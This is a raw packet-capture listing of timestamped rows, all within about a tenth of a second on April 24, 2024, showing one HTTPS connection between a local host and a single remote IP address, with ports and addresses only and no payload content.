Apr 24, 2024 08:40:09.390706062 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.390711069 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.392059088 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.392112970 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.392117977 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.393337011 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.393381119 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.393393040 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.394697905 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.394745111 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.394748926 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.396230936 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.396274090 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.396279097 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.397202015 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.397238970 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.397243977 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.398545980 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.398588896 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.398592949 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.399972916 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.400016069 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.400021076 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.401155949 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.401199102 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.401204109 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.402437925 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.402479887 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.402483940 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.403680086 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.403729916 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.403734922 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.405014992 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.405059099 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.405062914 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.406271935 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.406316042 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.406321049 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.407572985 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.407615900 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.407620907 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.408773899 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.408816099 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.408821106 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.409950018 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.409986019 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.409991026 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.411393881 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.411437035 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.411442041 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.412628889 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.412671089 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.412676096 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.413728952 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.413769960 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.413774014 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.415019989 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.415062904 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.415066957 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.416213989 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.416254044 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.416259050 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.417464972 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.417505980 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.417510986 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.418745995 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.418787956 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.418792963 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.419775009 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.419816971 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.419821024 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.421118975 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.421161890 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.421166897 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.422230005 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.422271013 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.422276020 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.423365116 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.423434973 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.423439026 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.424638987 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.424679041 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.424684048 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.425786972 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.425823927 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.425828934 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.427004099 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.427079916 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.427089930 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.428221941 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.428270102 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.428280115 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.429476023 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.429526091 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.429536104 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.430535078 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.430588007 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.430598021 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.431703091 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.431756973 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.431767941 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.432804108 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.432852030 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.432862997 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.434000969 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.434051991 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.434062004 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.435090065 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.435138941 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.435148954 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.436233044 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.436288118 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.436299086 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.437222958 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.437278032 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.437288046 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.438530922 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.438585043 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.438596964 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.439564943 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.439619064 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.439629078 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.440753937 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.440808058 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.440818071 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.441731930 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.441787004 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.441797018 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.443084955 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.443139076 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.443149090 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.444020987 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.444072008 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.444082022 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.444992065 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.445039988 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.445050955 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.446158886 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.446204901 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.446216106 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.447262049 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.447309971 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.447319984 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.448422909 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.448483944 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.448493958 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.449357033 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.449404955 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.449414968 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.450503111 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.450551033 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.450561047 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.451559067 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.451608896 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.451618910 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.452529907 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.452574968 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.452584982 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.453562975 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.453612089 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.453622103 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.454665899 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.454714060 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.454724073 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.455797911 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.455847025 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.455856085 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.456789017 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.456835032 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.456845045 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.458818913 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.458873987 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.458883047 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.459841967 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.459897041 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.459908009 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.460789919 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.460834026 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.460844040 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.461911917 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.461956978 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.461966038 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.462896109 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.462939024 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.462949038 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.463915110 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.463968992 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.463979006 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.464936972 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.464983940 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.464996099 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.466017962 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.466075897 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.466084957 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.466998100 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.467042923 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.467051983 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.467947960 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.467991114 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.467999935 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.468888044 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.468940973 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.468950987 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.469861031 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.469913006 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.469923019 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.470909119 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.470963001 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.470973015 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.471904039 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.471947908 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.471957922 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.472836018 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.472881079 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.472892046 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.473866940 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.473918915 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.473928928 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.474879980 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.474922895 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.474931955 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.475866079 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.475908995 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.475918055 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.476752996 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.476797104 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.476807117 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.477814913 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.477861881 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.477871895 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.478694916 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.478737116 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.478746891 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.479609966 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.479651928 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.479660988 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.480588913 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.480643988 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.480654001 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.481606007 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.481657982 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.481667995 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.482527971 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.482580900 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.482589960 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.483086109 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.483133078 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.483141899 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.483985901 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.484033108 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.484041929 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.484997988 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.485045910 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.485057116 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.485802889 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.485848904 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.485857964 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.486768007 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.486815929 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.486825943 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.487668037 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.487713099 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.487723112 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.488595963 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.488641024 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.488651037 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.489420891 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.489479065 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.489487886 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.490349054 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.490394115 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.490402937 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.491446018 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.491488934 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.491499901 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.492254019 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.492306948 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.492317915 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.493190050 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.493233919 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.493243933 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.494350910 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.494398117 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.494406939 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.494853973 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.494913101 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.494921923 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.495796919 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.495846033 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.495857000 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.496666908 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.496714115 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.496723890 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.497441053 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.497488022 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.497498035 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.498332977 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.498380899 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.498389959 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.499191999 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.499234915 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.499243975 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.500125885 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.500184059 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.500194073 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.500941992 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.500994921 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.501004934 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.501756907 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.501801014 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.501810074 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.502629995 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.502675056 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.502684116 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.503412962 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.503454924 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.503464937 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.504276991 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.504324913 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.504334927 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.505522013 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.505567074 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.505575895 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.506369114 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.506412983 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.506422043 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.507209063 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.507273912 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.507283926 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.508147001 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.508196115 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.508205891 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.508754969 CEST	443	49734	74.112.186.128	192.168.2.4
